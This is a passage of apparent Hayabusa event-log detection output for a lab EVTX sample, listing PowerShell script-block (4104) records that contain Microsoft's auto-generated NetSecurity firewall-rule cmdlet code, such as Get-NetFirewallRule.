[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 